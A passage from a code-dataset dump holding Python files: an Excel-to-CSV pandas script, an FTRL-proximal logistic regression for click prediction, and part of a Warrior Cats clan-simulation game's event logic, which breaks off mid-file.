0\n for word in tagged_words:\n if (word[1] == 'NNP'):\n if (i == 0):\n term += word[0]\n else:\n term += ' ' + word[0]\n\n i += 1\n \n sparql.howToCook(term)\n\n","repo_name":"Cardoso222/NL2SPARQL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"7722725014","text":"# python gencsvs.py \n# run from CMD with anaconda prompt\nimport pandas as pd\n#\ndef g1():\n df = pd.read_excel('covmenu.xlsx', sheet_name='Hoja1')\n #\n df.to_csv(r'covmenu1.csv', index = False, header=True)\n print(\"g1\")\n\ndef g2():\n df = pd.read_excel('covmenu.xlsx', sheet_name='Hoja2')\n #\n df.to_csv(r'covmenu2.csv', index = False, header=True) \n print(\"g1\")\n# - - - - - - - - - - - - - - - - - - - - - \n#\nprint(\"ini\")\ng1()\n# \ng2() \n#\nprint(\"fin\")","repo_name":"DENRIV/PythonFlaskCovXXI","sub_path":"gencsvs.py","file_name":"gencsvs.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8752820223","text":"from csv import reader\r\nfrom math import exp, sqrt\r\nfrom random import random\r\n\r\nfrom xxhash import xxh64\r\n\r\n\r\ndef data(path, D):\r\n ''' GENERATOR: \r\n Apply hash-trick to the original csv row\r\n and for simplicity, we one-hot-encode everything\r\n\r\n INPUT:\r\n path: path to training or testing file\r\n D: the max index that we can hash to\r\n\r\n YIELDS:\r\n x: a list of hashed and one-hot-encoded 'indices'\r\n we only need the index since all values are either 0 or 1\r\n y: y = 1 if we have a click, else we have y = 0\r\n '''\r\n \r\n with open(path, 'r', encoding='utf-8') as f:\r\n csvreader = reader(f) # create a CSV reader\r\n header = next(csvreader)\r\n for row in csvreader: # iterate over the available rows\r\n row = dict(zip(header, row))\r\n \r\n # ts and bid_id are used only while updating train data\r\n for feat in ['bid_id', 'ts']:\r\n if feat in row:\r\n del row[feat]\r\n \r\n # process clicks\r\n y = 0.\r\n target='click'\r\n if target in row:\r\n if row[target] == '1':\r\n y = 1.\r\n del row[target]\r\n \r\n # build x\r\n x = []\r\n for key in row:\r\n value = row[key]\r\n # one-hot encode everything with hash trick\r\n index = xxh64(key + '_' + value).intdigest() % D\r\n x.append(index)\r\n \r\n yield x, y\r\n\r\n\r\nclass ftrl_proximal(object):\r\n ''' Main algorithm: Follow the regularized leader - proximal\r\n\r\n In short,\r\n this is an adaptive-learning-rate sparse logistic-regression with\r\n efficient L1-L2-regularization\r\n\r\n Reference:\r\n http://www.eecs.tufts.edu/~dsculley/papers/ad-click-prediction.pdf\r\n '''\r\n\r\n def __init__(self, alpha, beta, L1, L2, D, interaction):\r\n # parameters\r\n self.alpha = alpha\r\n self.beta = beta\r\n self.L1 = L1\r\n self.L2 = L2\r\n\r\n # feature related parameters\r\n self.D = D\r\n self.interaction = interaction\r\n\r\n # model\r\n # n: squared sum of past gradients\r\n # z: weights\r\n # w: lazy weights\r\n self.n = [0.] * D\r\n self.z = [random() for k in range(D)] #[0.] 
* D\r\n self.w = {}\r\n\r\n def _indices(self, x):\r\n ''' A helper generator that yields the indices in x\r\n\r\n The purpose of this generator is to make the following\r\n code a bit cleaner when doing feature interaction.\r\n '''\r\n\r\n # first yield index of the bias term\r\n yield 0\r\n\r\n # then yield the normal indices\r\n for index in x:\r\n yield index\r\n\r\n # now yield interactions (if applicable)\r\n if self.interaction:\r\n D = self.D\r\n L = len(x)\r\n\r\n x = sorted(x)\r\n for i in range(L):\r\n for j in range(i+1, L):\r\n # one-hot encode interactions with hash trick\r\n yield xxh64(str(x[i]) + '_' + str(x[j])).intdigest() % D\r\n\r\n def predict(self, x):\r\n ''' Get probability estimation on x\r\n\r\n INPUT:\r\n x: features\r\n\r\n OUTPUT:\r\n probability of p(y = 1 | x; w)\r\n '''\r\n\r\n # parameters\r\n alpha = self.alpha\r\n beta = self.beta\r\n L1 = self.L1\r\n L2 = self.L2\r\n\r\n # model\r\n n = self.n\r\n z = self.z\r\n w = {}\r\n\r\n # wTx is the inner product of w and x\r\n wTx = 0.\r\n for i in self._indices(x):\r\n sign = -1. if z[i] < 0 else 1. # get sign of z[i]\r\n\r\n # build w on the fly using z and n, hence the name - lazy weights\r\n # we are doing this at prediction instead of update time is because\r\n # this allows us for not storing the complete w\r\n if sign * z[i] <= L1:\r\n # w[i] vanishes due to L1 regularization\r\n w[i] = 0.\r\n else:\r\n # apply prediction time L1, L2 regularization to z and get w\r\n w[i] = round((sign * L1 - z[i]) / ((beta + sqrt(n[i])) / alpha + L2), 5)\r\n\r\n wTx += w[i]\r\n\r\n # cache the current w for update stage\r\n self.w = w\r\n\r\n # bounded sigmoid function, this is the probability estimation\r\n return 1. / (1. + exp(-max(min(wTx, 35.), -35.)))\r\n\r\n def update(self, x, p, y):\r\n ''' Update model using x, p, y\r\n\r\n INPUT:\r\n x: feature, a list of indices\r\n p: click probability prediction of our model\r\n y: answer\r\n\r\n MODIFIES:\r\n self.n: increase by squared gradient\r\n self.z: weights\r\n '''\r\n\r\n # parameter\r\n alpha = self.alpha\r\n\r\n # model\r\n n = self.n\r\n z = self.z\r\n w = self.w\r\n\r\n # gradient under logloss\r\n g = p - y\r\n\r\n # update z and n\r\n for i in self._indices(x):\r\n # if there were too many gradient steps along the feature\r\n # don't do step\r\n if (abs(z[i]) > 10e15)|(n[i] > 10e30):\r\n continue\r\n else:\r\n sigma = (sqrt(n[i] + g * g) - sqrt(n[i])) / alpha\r\n z[i] += g - sigma * w[i]\r\n n[i] += g * g\r\n \r\n def fit(self, path, epoch_num):\r\n ''' Fit model on a bunch of training data\r\n\r\n INPUT:\r\n path: path to training file\r\n epoch_num: number of training epochs\r\n\r\n MODIFIES:\r\n self.n: increase by squared gradient\r\n self.z: weights\r\n '''\r\n for e in range(epoch_num):\r\n for x, y in data(path, self.D): # data is a generator\r\n p = self.predict(x)\r\n self.update(x, p, y)\r\n \r\n def test(self, path):\r\n ''' Get target values and corresponding prediction for a bunch of test data\r\n\r\n INPUT:\r\n path: path to test file\r\n\r\n OUTPUT:\r\n ys: list of target values\r\n preds: list of prediction values\r\n '''\r\n preds = []\r\n ys = []\r\n for x, y in data(path, self.D):\r\n p = self.predict(x)\r\n preds += [p]\r\n ys += [y]\r\n return ys, preds\r\n \r\n def output_weigts(self):\r\n ''' Build the complete weight vector (for following saving)\r\n\r\n OUTPUT:\r\n w: weight vector for logistic regression\r\n '''\r\n alpha = self.alpha\r\n beta = self.beta\r\n L1 = self.L1\r\n L2 = self.L2\r\n \r\n # model\r\n n = self.n\r\n z = 
self.z\r\n w = {}\r\n for i in range(len(z)):\r\n sign = -1. if z[i] < 0 else 1. # get sign of z[i]\r\n \r\n # build the complete w\r\n if sign * z[i] <= L1:\r\n # w[i] vanishes due to L1 regularization\r\n w[i] = 0.\r\n else:\r\n # apply prediction time L1, L2 regularization to z and get w\r\n w[i] = round((sign * L1 - z[i]) / ((beta + sqrt(n[i])) / alpha + L2), 5)\r\n \r\n return w\r\n \r\n","repo_name":"mkhasykov/for_rtb_pricing_function","sub_path":"xxftrl.py","file_name":"xxftrl.py","file_ext":"py","file_size_in_byte":7372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18908662368","text":"from .cats import *\nfrom .buttons import *\nfrom .relation_events import * \n\nclass Events(object):\n all_events = {}\n\n def __init__(self, e_type=None, **cats):\n self.e_type = e_type\n self.ID = str(randint(0, 9)) + str(randint(0, 9)) + str(randint(\n 0, 9)) + str(randint(0, 9))\n if e_type is not None:\n self.all_events[self.ID] = self\n self.cats = cats\n self.at_war = False\n self.time_at_war = False\n self.enemy_clan = None\n self.living_cats = 0\n self.new_cat_invited = False\n self.ceremony_accessory = False\n game.switches['pregnancy'] = False\n game.switches['birth_cooldown'] = False\n if game.switches['birth_cooldown']:\n birth_range = randint(6, 9)\n\n def one_moon(self):\n if game.switches['timeskip']:\n game.switches['saved_clan'] = False\n self.living_cats = 0\n self.new_cat_invited = False\n game.patrolled.clear()\n for cat in cat_class.all_cats.copy().values():\n if not cat.dead and not cat.exiled:\n self._extracted_from_one_moon_7(cat)\n elif cat.exiled:\n cat.moons += 1\n if cat.moons == 6:\n cat.age = 'adolescent'\n elif cat.moons == 12:\n cat.age = 'adult'\n elif cat.moons == 100:\n cat.age = 'elder'\n if cat.moons > randint(100, 200):\n if choice([1, 2, 3, 4, 5]) == 1 and cat.dead == False:\n cat.dead = True\n game.cur_events_list.append(f'Rumors reach your clan that the exiled {str(cat.name)} has died recently')\n\n if cat.exiled and cat.status == 'leader' and cat.dead == False and randint(\n 1, 10) == 1:\n game.clan.leader_lives -= 1\n if game.clan.leader_lives <= 0:\n cat.dead = True\n game.cur_events_list.append(f'Rumors reach your clan that the exiled {str(cat.name)} has died recently')\n\n game.clan.leader_lives = 0\n elif cat.exiled and cat.status == 'leader' and cat.dead == False and randint(\n 1, 45) == 1:\n game.clan.leader_lives -= 10\n cat.dead = True\n game.cur_events_list.append(f'Rumors reach your clan that the exiled {str(cat.name)} has died recently')\n\n game.clan.leader_lives = 0\n else:\n cat.dead_for += 1\n\n # interaction here so every cat may have got a new name\n relation_events = Relation_Events()\n cat_list = list(cat_class.all_cats.copy().values())\n random.shuffle(cat_list)\n for cat in cat_list:\n if not cat.dead and not cat.exiled:\n relation_events.create_interaction(cat)\n relation_events.handle_relationships(cat)\n relation_events.check_if_having_kits(cat)\n #relation_events.have_kits(cat)\n cat_class.thoughts()\n self.check_clan_relations()\n game.clan.age += 1\n if game.settings.get(\n 'autosave') is True and game.clan.age % 5 == 0:\n cat_class.json_save_cats()\n game.clan.save_clan()\n game.clan.current_season = game.clan.seasons[game.clan.age % 12]\n game.event_scroll_ct = 0\n has_med = any(\n str(cat.status) in {\"medicine cat\", \"medicine cat apprentice\"}\n and not cat.dead and not cat.exiled\n for cat in cat_class.all_cats.values())\n\n if not has_med:\n 
game.cur_events_list.insert(\n 0, f\"{game.clan.name}Clan has no medicine cat!\")\n if game.clan.deputy == 0 or game.clan.deputy is None or game.clan.deputy.dead or game.clan.deputy.exiled:\n game.cur_events_list.insert(\n 0, f\"{game.clan.name}Clan has no deputy!\")\n if game.clan.leader.dead or game.clan.leader.exiled:\n game.cur_events_list.insert(\n 0, f\"{game.clan.name}Clan has no leader!\")\n if game.switches['birth_cooldown']:\n birth_range -= 1\n\n game.switches['timeskip'] = False\n\n # TODO Rename this here and in `one_moon`\n def _extracted_from_one_moon_7(self, cat):\n self.living_cats += 1\n cat.in_camp = 1\n self.check_age(cat)\n self.perform_ceremonies(cat)\n if self.new_cat_invited == False or self.living_cats < 10:\n self.invite_new_cats(cat)\n self.other_interactions(cat)\n self.gain_accessories(cat)\n self.gain_scars(cat)\n self.handle_deaths(cat)\n\n def check_clan_relations(self):\n if len(game.clan.all_clans) > 0 and randint(1, 5) == 1:\n war_notice = ''\n for other_clan in game.clan.all_clans:\n if int(other_clan.relations) <= 5:\n if randint(1, 5) == 1 and self.time_at_war > 2:\n self.at_war = False\n self.time_at_war = 0\n other_clan.relations = 10\n game.cur_events_list.append('The war against ' +\n str(other_clan.name) +\n 'Clan has ended')\n elif self.time_at_war == 0:\n game.cur_events_list.append('The war against ' +\n str(other_clan.name) +\n 'Clan has begun')\n self.time_at_war += 1\n else:\n self.enemy_clan = f'{str(other_clan.name)}Clan'\n possible_text = [\n f'War rages between {game.clan.name}Clan and {other_clan.name}Clan',\n f'{other_clan.name}Clan has taken some of {game.clan.name}'\n + \"Clan\\'s territory\",\n f'{game.clan.name}Clan has claimed some of {other_clan.name}'\n + \"Clan\\'s territory\",\n f'{other_clan.name}Clan attempted to break into your camp during the war',\n f'The war against {other_clan.name}Clan continues',\n f'{game.clan.name}Clan is starting to get tired of the war against {other_clan.name}Clan',\n f'{game.clan.name}Clan warriors plan new battle strategies for the war',\n f'{game.clan.name}Clan warriors reinforce the camp walls'\n ]\n if game.clan.medicine_cat is not None:\n possible_text.extend([\n 'The medicine cats worry about having enough herbs to treat their clan\\'s wounds'\n ])\n war_notice = choice(possible_text)\n self.time_at_war += 1\n break\n elif int(other_clan.relations) > 30:\n other_clan.relations = 10\n else:\n self.at_war = False\n if war_notice:\n game.cur_events_list.append(war_notice)\n\n def perform_ceremonies(self, cat):\n if (game.clan.leader.dead or game.clan.leader.exiled\n ) and game.clan.deputy is not None and not game.clan.deputy.dead:\n if game.clan.leader.exiled:\n game.cur_events_list.append(\n str(game.clan.leader.name) + ' was exiled')\n else:\n game.cur_events_list.append(\n str(game.clan.leader.name) +\n ' has lost their last life and has travelled to StarClan')\n game.clan.new_leader(game.clan.deputy)\n game.clan.leader_lives = 9\n game.cur_events_list.append(\n f'{str(game.clan.deputy.name)} has been promoted to the new leader of the clan'\n )\n self.ceremony_accessory = True\n self.gain_accessories(cat)\n game.clan.deputy = None\n if not cat.dead:\n cat.moons += 1\n if cat.status == 'deputy' and game.clan.deputy is None:\n game.clan.deputy = cat\n if cat.moons > cat_class.age_moons[cat.age][1]:\n if cat.age != 'elder':\n cat.age = cat_class.ages[cat_class.ages.index(cat.age) + 1]\n if cat.status == 'kitten' and cat.age == 'adolescent':\n cat.status_change('apprentice')\n 
game.cur_events_list.append(\n f'{str(cat.name)} has started their apprenticeship')\n self.ceremony_accessory = True\n self.gain_accessories(cat)\n cat.update_mentor()\n elif cat.status == 'apprentice' and cat.age == 'young adult':\n self._extracted_from_perform_ceremonies_19(\n cat, 'warrior', ' has earned their warrior name')\n self.ceremony_accessory = True\n self.gain_accessories(cat)\n elif cat.status == 'medicine cat apprentice' and cat.age == 'young adult':\n self._extracted_from_perform_ceremonies_19(\n cat, 'medicine cat',\n ' has earned their medicine cat name')\n self.ceremony_accessory = True\n self.gain_accessories(cat)\n game.clan.new_medicine_cat(cat)\n elif cat.status == 'deputy' and cat.age == 'elder' and len(\n cat.apprentice) < 1:\n cat.status_change('elder')\n game.clan.deputy = None\n game.cur_events_list.append(\n f'The deputy {str(cat.name)} has retired to the elder den'\n )\n elif cat.status == 'warrior' and cat.age == 'elder' and len(\n cat.apprentice) < 1:\n cat.status_change('elder')\n game.cur_events_list.append(\n f'{str(cat.name)} has retired to the elder den')\n if cat.status in [\n 'warrior', 'deputy'\n ] and cat.age == 'elder' and len(cat.apprentice) < 1:\n cat.status_change('elder')\n if str(cat.status) == 'deputy':\n game.clan.deputy = None\n game.cur_events_list.append(\n f'{str(cat.name)} has retired to the elder den')\n\n # TODO Rename this here and in `perform_ceremonies`\n def _extracted_from_perform_ceremonies_19(self, cat, arg1, arg2):\n cat.status_change(arg1)\n cat.update_mentor()\n game.cur_events_list.append(f'{str(cat.name)}{arg2}')\n\n def gain_accessories(self, cat):\n if cat.accessory is not None:\n return\n name = str(cat.name)\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n other_name = str(other_cat.name)\n acc_text = []\n chance = randint(0, 50)\n if cat.age in ['kitten', 'adolescent']:\n chance = randint(0, 70)\n elif cat.age in ['young adult', 'adult', 'senior adult', 'elder']:\n chance = randint(0, 150)\n elif cat.trait in ['childish', 'lonesome', 'loving', 'playful', 'shameless', 'strange', 'troublesome']:\n chance = randint(0, 40)\n elif cat.status in ['medicine cat', 'medicine cat apprentice']:\n chance = randint(0, 30)\n if chance == 1:\n if cat.accessory is None:\n cat.accessory = choice([\n choice(plant_accessories),\n choice(wild_accessories)\n ])\n accessory = cat.accessory\n #if self.ceremony_accessory == True:\n # acc_text.extend([f'{other_name} gives {name} something to adorn their pelt as congratulations', f'{name} decides to pick something to adorn their pelt as celebration'])\n if cat.age != 'kitten':\n if cat.accessory in [\"FORGET ME NOTS\", \"BLUEBELLS\", \"POPPY\"]:\n if game.clan.current_season == 'Leaf-bare':\n acc_text.append(f'{name} found a mysterious flower growing in the {choice([\"snow\", \"ice\", \"frost\"])} and decided to wear it')\n else:\n acc_text.extend([f'{name} received a flower from {other_name} and decided to wear it on their pelt',\n f'{name} found a pretty flower and decided to wear it on their pelt', f'A clanmate gave {name} a flower and they decided to wear it'\n ])\n elif cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"] and cat.specialty != \"NOTAIL\" and cat.specialty2 != \"NOTAIL\":\n acc_text.append(f'{name} found a bunch of pretty feathers and 
decided to wear them')\n elif cat.accessory in [\"HERBS\", \"PETALS\", \"DRY_HERBS\"]:\n acc_text.append(f'{name} always seems to have something stuck in their fur')\n elif cat.accessory in plant_accessories and cat.status in ['medicine cat apprentice', 'medicine cat']:\n acc_text.extend([f'{name} has decided to always bring their {accessory.lower()} with them',\n f'{accessory.lower()} - an item so important to {name} that they always carry it around'.capitalize,\n f'{accessory.lower()} - so vital for {name} that they always have it on them'.capitalize\n ])\n else:\n acc_text.extend([f'{name} finds something interesting and decides to wear it on their pelt', f'A clanmate gives {name} a pretty accessory and they decide to wear it on their pelt',\n f'{name} finds something interesting while out on a walk and decides to wear it on their pelt', f'{name} finds {accessory.lower()} fascinating and decides to wear it on their pelt',\n f'A clanmate gives {name} something to adorn their pelt as a gift', f'{other_name} gives {name} a pretty accessory and they decide to wear it on their pelt'\n ])\n else:\n if cat.accessory in [\"FORGET ME NOTS\", \"BLUEBELLS\", \"POPPY\"]:\n acc_text.extend([f'{name} received a flower from {other_name} and decided to wear it on their pelt',\n f'{name} found a pretty flower and decided to wear it on their pelt', f'A clanmate gave {name} a flower and they decided to wear it'\n ])\n elif cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"] and cat.specialty != \"NOTAIL\" and cat.specialty2 != \"NOTAIL\":\n acc_text.append(f'{name} was playing with feathers earlier and decided to wear some of them')\n elif cat.accessory in [\"HERBS\", \"PETALS\", \"DRYHERBS\"]:\n acc_text.append(f'{name}\\'s parents try their best to groom them, but something is always stuck in their fur')\n else: \n acc_text.extend([f'{name} seems to have picked something up while playing out in the camp', f'{name} finds something interesting and decides to wear it on their pelt',\n f'A clanmate gives {name} a pretty accessory and they decide to wear it on their pelt', f'{other_name} gives {name} a pretty accessory and they decide to wear it on their pelt',\n f'{name} is so cute that they are given {accessory.lower()} as a gift', f'{name} starts to wear {accessory.lower()} on their pelt after their friend gave it to them',\n f'{name} was playing with {accessory.lower()} earlier and has decided to use it to adorn themselves'\n ])\n if acc_text:\n game.cur_events_list.append(choice(acc_text))\n if self.ceremony_accessory:\n self.ceremony_accessory = False \n\n def gain_scars(self, cat):\n if cat.specialty is not None and cat.specialty2 is not None or cat.age == 'kitten':\n return\n name = str(cat.name)\n other_cat = choice(list(cat_class.all_cats.values()))\n scar_chance = randint(0, 40)\n clancats = int(self.living_cats)\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n other_name = str(other_cat.name)\n scar_text = []\n clan_has_kits = any(\n str(cat.status) in \"kitten\"\n and not cat.dead and not cat.exiled\n for cat in cat_class.all_cats.values())\n if clancats > 45:\n scar_chance = scar_chance + 20\n elif clancats > 120:\n scar_chance = scar_chance * 2\n elif clancats > 300:\n scar_chance = scar_chance + 80\n else:\n scar_chance = scar_chance\n if cat.age in ['adolescent', 'young adult']:\n chance = scar_chance\n elif 
cat.age in ['adult', 'senior adult']:\n chance = scar_chance + 10\n elif cat.age in [\n 'apprentice', 'medicine cat apprentice'\n ] and cat.mentor.ID == other_cat.ID and other_cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sadistic', 'cold',\n 'tough', 'clumsy', 'controlling', 'fierce', 'petty', 'strict'\n ]:\n chance = scar_chance - 15\n elif other_cat.status in ['leader', 'deputy'] and other_cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sadistic', 'cold',\n 'tough', 'clumsy', 'controlling', 'fierce', 'petty', 'strict'\n ]:\n chance = scar_chance\n else:\n chance = scar_chance\n if chance == 1:\n if cat.specialty is None:\n cat.specialty = choice([\n choice(scars1),\n choice(scars2),\n choice(scars4),\n choice(scars5)\n ])\n if cat.specialty == 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]))\n elif cat.specialty == 'SNAKE':\n scar_text.append(f'{name} was bit by a snake but lived')\n elif cat.specialty == 'TOETRAP':\n scar_text.append(\n f'{name} got their paw stuck in a twoleg trap and earned a scar'\n )\n else:\n scar_text.extend([\n f'{name} earned a scar fighting a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]), f'{name} earned a scar defending the territory',\n f'{name} earned a scar protecting the kits',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after accidentally wandering over the border',\n f'{name} is injured after messing with a twoleg object'\n ])\n elif cat.specialty2 is None:\n cat.specialty2 = choice([\n choice(scars1),\n choice(scars2),\n choice(scars4),\n choice(scars5)\n ])\n if cat.specialty2 == 'NOTAIL' and cat.specialty != 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]))\n elif cat.specialty2 == 'SNAKE' and cat.specialty != 'SNAKE':\n scar_text.append(f'{name} was bit by a snake but lived')\n elif cat.specialty2 == 'TOETRAP' and cat.specialty != 'TOETRAP':\n scar_text.append(\n f'{name} got their paw stuck in a twoleg trap and earned a scar'\n )\n else:\n if clan_has_kits == True:\n scar_text.extend([\n f'{name} earned a scar protecting the kits'])\n else:\n scar_text.extend([\n f'{name} earned a scar fighting a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]), f'{name} earned a scar defending the territory',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after accidentally wandering over the border',\n f'{name} is injured after messing with a twoleg object',\n f'{name} is injured after a fight broke out with ' +\n other_name\n ])\n\n elif chance == 1 and cat.status in [\n 'apprentice', 'medicine cat apprentice'\n ] and cat.mentor.ID == other_cat.ID and other_cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sadistic', 'cold',\n 'tough', 'clumsy', 'controlling', 'fierce', 'petty', 'strict'\n ]:\n if cat.specialty is None:\n cat.specialty = choice([choice(scars1), choice(scars2)])\n if cat.specialty == 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n 
cat.accessory = None\n\n scar_text.append(\n f'{name} recklessly lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' encouraged by their mentor')\n else:\n if clan_has_kits == True:\n scar_text.extend([\n f'{name} earned a scar protecting the kits'])\n else:\n scar_text.extend([\n f'{name} earned a scar recklessly fighting a ' +\n choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]) + ' encouraged by their mentor',\n f'{name} earned a scar for not defending the territory well enough',\n f'{name} is injured after being pushed into a river',\n f'{name} is punished by their mentor after accidentally wandering over the border',\n f'{name} is injured by their mentor after being caught messing with a twoleg object'\n f'{name} is injured by their mentor while practicing with their claws out',\n f'{name}\\'s mentor punished them for disobeying',\n f'{name} gained a scar while fighting their mentor',\n f'{name} is injured while practicing their battle moves with '\n + other_name,\n f'{name} is injured after a fight broke out with ' +\n other_name,\n f'{name} could not handle their mentor\\'s harsh training and got injured as a result',\n f'{name} could not handle their mentor\\'s harsh training and got injured as a result'\n ])\n elif cat.specialty2 is None:\n cat.specialty2 = choice([choice(scars1), choice(scars2)])\n if cat.specialty2 == 'NOTAIL' and cat.specialty != 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' encouraged by their mentor')\n else:\n if clan_has_kits == True:\n scar_text.extend([\n f'{name} earned a scar protecting the kits'])\n else:\n scar_text.extend([\n f'{name} earned a scar recklessly fighting a ' +\n choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]) + ' encouraged by their mentor',\n f'{name} earned a scar for not defending the territory well enough',\n f'{name} is injured after being pushed into a river',\n f'{name} is punished by their mentor after accidentally wandering over the border',\n f'{name} is injured by their mentor after being caught messing with a twoleg object'\n f'{name} is injured by their mentor while practicing with their claws out',\n f'{name}\\'s mentor punished them for disobeying',\n f'{name} gained a scar while fighting their mentor',\n f'{name} is injured while practicing their batle moves with '\n + other_name,\n f'{name} is injured after a fight broke out with ' +\n other_name,\n f'{name} could not handle their mentor\\'s harsh training and got injured as a result'\n ])\n\n elif chance == 1 and cat.status in [\n 'warrior', 'deputy', 'medicine cat'\n ] and other_cat.status == 'leader':\n if cat.specialty is None:\n cat.specialty = choice([choice(scars1), choice(scars2)])\n if cat.specialty == 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' while following orders')\n else:\n scar_text.extend([\n f'While following orders {name} earned a scar fighting a '\n + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 
'hawk',\n 'enemy warrior', 'badger'\n ]),\n f'{name} earned a scar defending the territory from outsiders',\n f'{name} earned a scar protecting the leader',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after being ordered to go over the border',\n f'{name} is injured after being ordered to check out a twoleg object'\n ])\n elif cat.specialty2 is None:\n cat.specialty2 = choice([choice(scars1), choice(scars2)])\n if cat.specialty2 == 'NOTAIL' and cat.specialty != 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' while following orders')\n else:\n scar_text.extend([\n f'While following orders, {name} earned a scar fighting a '\n + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]),\n f'{name} earned a scar defending the territory from outsiders',\n f'{name} earned a scar protecting the leader',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after being ordered to go over the border',\n f'{name} is injured after being ordered to check out a twoleg object'\n ])\n\n elif chance == 1 and other_cat.status == 'leader' and other_cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sadistic',\n 'controlling', 'fierce', 'petty'\n ]:\n if cat.specialty is None:\n cat.specialty = choice([choice(scars1), choice(scars2)])\n if cat.specialty == 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' while following orders')\n else:\n scar_text.extend([\n f'While following orders, {name} earned a scar fighting a '\n + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]),\n f'{name} earned a scar defending the territory from outsiders',\n f'{name} earned a scar protecting the leader',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after being ordered to go over the border',\n f'{name} is injured after being ordered to check out a twoleg object',\n f'{name} is injured while fighting a clanmate encouraged by '\n + other_name, f'{name} is injured by ' + other_name +\n ' for disobeying orders', f'{name} is injured by ' +\n other_name + ' for speaking out against them',\n f'{name} is cruelly injured by ' + other_name +\n ' to make an example out of them'\n ])\n elif cat.specialty2 is None:\n cat.specialty2 = choice([choice(scars1), choice(scars2)])\n if cat.specialty2 == 'NOTAIL' and cat.specialty != 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' while following orders')\n else:\n scar_text.extend([\n f'While following orders {name} earned a scar fighting a '\n + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]),\n f'{name} earned a scar defending the territory from outsiders',\n f'{name} earned a scar protecting the leader',\n f'{name} is injured after falling into a 
